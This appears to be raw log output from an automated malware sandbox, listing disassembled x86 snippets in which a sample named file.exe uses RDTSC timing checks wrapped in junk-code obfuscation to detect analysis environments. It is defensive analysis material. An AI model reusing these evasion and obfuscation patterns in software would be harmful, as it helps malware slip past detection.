Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B237D9 second address: B237E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F10E0B669C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2396A second address: B2396F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2396F second address: B23975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23975 second address: B239CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F10E0E4A428h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 or dword ptr [ebp+122D3005h], ecx 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D34DCh] 0x00000032 call 00007F10E0E4A429h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F10E0E4A436h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B239CC second address: B23A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F10E0B669C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnc 00007F10E0B669E6h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F10E0B669CBh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jc 00007F10E0B669C8h 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23A1C second address: B23A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jnl 00007F10E0E4A42Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23A48 second address: B23A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23A4C second address: B23ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D2BD4h], edi 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 or si, 33ABh 0x00000017 push 00000003h 0x00000019 pushad 0x0000001a or dword ptr [ebp+122D3374h], eax 0x00000020 pushad 0x00000021 xor edx, dword ptr [ebp+122D19C6h] 0x00000027 mov bl, 4Ch 0x00000029 popad 0x0000002a popad 0x0000002b push C68B691Bh 0x00000030 pushad 0x00000031 js 00007F10E0E4A434h 0x00000037 jmp 00007F10E0E4A42Eh 0x0000003c push ecx 0x0000003d je 00007F10E0E4A426h 0x00000043 pop ecx 0x00000044 popad 0x00000045 xor dword ptr [esp], 068B691Bh 0x0000004c mov esi, 2C7BF526h 0x00000051 lea ebx, dword ptr [ebp+124576B3h] 0x00000057 movsx ecx, di 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e jmp 00007F10E0E4A434h 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23ACA second address: B23AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23B81 second address: B23B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23B87 second address: B23B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23B8B second address: B23BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D37DCh] 0x0000000f push 00000000h 0x00000011 add esi, dword ptr [ebp+122D3764h] 0x00000017 push CC9F2030h 0x0000001c jng 00007F10E0E4A430h 0x00000022 jmp 00007F10E0E4A42Ah 0x00000027 add dword ptr [esp], 3360E050h 0x0000002e pushad 0x0000002f mov cx, si 0x00000032 popad 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 mov dl, AEh 0x00000039 mov esi, ebx 0x0000003b push 00000003h 0x0000003d sub dword ptr [ebp+122D2C7Eh], ebx 0x00000043 push 887B9D9Eh 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F10E0E4A437h 0x00000050 push edx 0x00000051 pop edx 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23BF5 second address: B23BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23BFB second address: B23BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1023F second address: B10244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B10244 second address: B10275 instructions: 0x00000000 rdtsc 0x00000002 js 00007F10E0E4A436h 0x00000008 jmp 00007F10E0E4A430h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F10E0E4A42Fh 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B10275 second address: B1027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1027E second address: B102A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F10E0E4A437h 0x0000000d jnp 00007F10E0E4A426h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4525A second address: B45266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F10E0B669C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45266 second address: B45297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10E0E4A436h 0x0000000a jne 00007F10E0E4A428h 0x00000010 popad 0x00000011 push ecx 0x00000012 js 00007F10E0E4A428h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45297 second address: B452A1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F10E0B669C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45C35 second address: B45C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45C39 second address: B45C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45C3D second address: B45C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F10E0E4A426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45DB9 second address: B45DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45F20 second address: B45F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45F25 second address: B45F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F10E0B669D5h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 js 00007F10E0B669C8h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F10E0B669D5h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3A7FC second address: B3A807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3A807 second address: B3A82F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10E0B669D9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46690 second address: B466D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A435h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F10E0E4A42Ah 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F10E0E4A435h 0x0000001a jmp 00007F10E0E4A42Fh 0x0000001f jng 00007F10E0E4A428h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4AD8D second address: B4ADA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F10E0B669D1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B2A3 second address: B4B2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 je 00007F10E0E4A42Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49C7A second address: B49C84 instructions: 0x00000000 rdtsc 0x00000002 je 00007F10E0B669CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CFE9 second address: B4CFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4E64B second address: B4E64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4E64F second address: B4E661 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F10E0E4A426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0482B second address: B04837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F10E0B669C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B04837 second address: B04843 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F10E0E4A42Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B04843 second address: B04873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F10E0B669C8h 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F10E0B669D8h 0x00000014 pushad 0x00000015 jne 00007F10E0B669C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52DEF second address: B52E10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A431h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F10E0E4A42Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52E10 second address: B52E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52E15 second address: B52E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52E1D second address: B52E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669CEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F10E0B669CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52E42 second address: B52E4C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10E0E4A426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B24E second address: B0B254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5261E second address: B5263B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A431h 0x00000009 jns 00007F10E0E4A426h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5263B second address: B52640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52640 second address: B52681 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F10E0E4A44Bh 0x00000008 jmp 00007F10E0E4A437h 0x0000000d jmp 00007F10E0E4A42Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c ja 00007F10E0E4A42Eh 0x00000022 push edx 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52681 second address: B52685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52AA5 second address: B52AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52C30 second address: B52C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52C48 second address: B52C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0E4A432h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52C71 second address: B52C7B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10E0B669CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55004 second address: B55008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55008 second address: B5500C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5500C second address: B55012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A3EE second address: B1A3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A3F2 second address: B1A3FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A3FC second address: B1A40F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10E0B669CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A40F second address: B1A415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A415 second address: B1A424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A424 second address: B1A42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A42E second address: B1A434 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A434 second address: B1A445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F10E0E4A42Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A445 second address: B1A44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B576FC second address: B57700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57700 second address: B57706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57706 second address: B5771E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jl 00007F10E0E4A430h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5771E second address: B5774E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F10E0B669D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edi 0x00000010 pop edi 0x00000011 popad 0x00000012 push D9741078h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F10E0B669C6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5774E second address: B57754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57754 second address: B5776A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0B669D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5776A second address: B5776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57ABC second address: B57AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c js 00007F10E0B669CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57BB0 second address: B57BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57BB4 second address: B57BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57C92 second address: B57C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57C96 second address: B57CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57DA8 second address: B57DAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57DAE second address: B57DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57EAD second address: B57EB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B58488 second address: B58492 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10E0B669CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B586C4 second address: B586CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B586CA second address: B586CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5888B second address: B588A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F10E0E4A43Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F10E0E4A42Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5899F second address: B589E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F10E0B669C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F10E0B669C8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D189Dh], eax 0x0000002f push eax 0x00000030 jo 00007F10E0B669D0h 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A842 second address: B5A846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5BE19 second address: B5BE9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F10E0B669C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jmp 00007F10E0B669D5h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F10E0B669C8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 cld 0x00000044 push 00000000h 0x00000046 mov si, dx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b jmp 00007F10E0B669CBh 0x00000050 pop eax 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F10E0B669D7h 0x00000059 rdtsc
